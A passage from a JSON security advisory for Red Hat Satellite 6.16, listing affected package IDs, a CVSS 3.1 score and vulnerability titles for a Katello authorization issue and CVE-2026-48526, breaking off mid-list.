"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "katello: missing repository authorization in content_uploads exposes cross-product content existence"
},
{
"cve": "CVE-2026-48526",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-05-28T16:01:22.805235+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
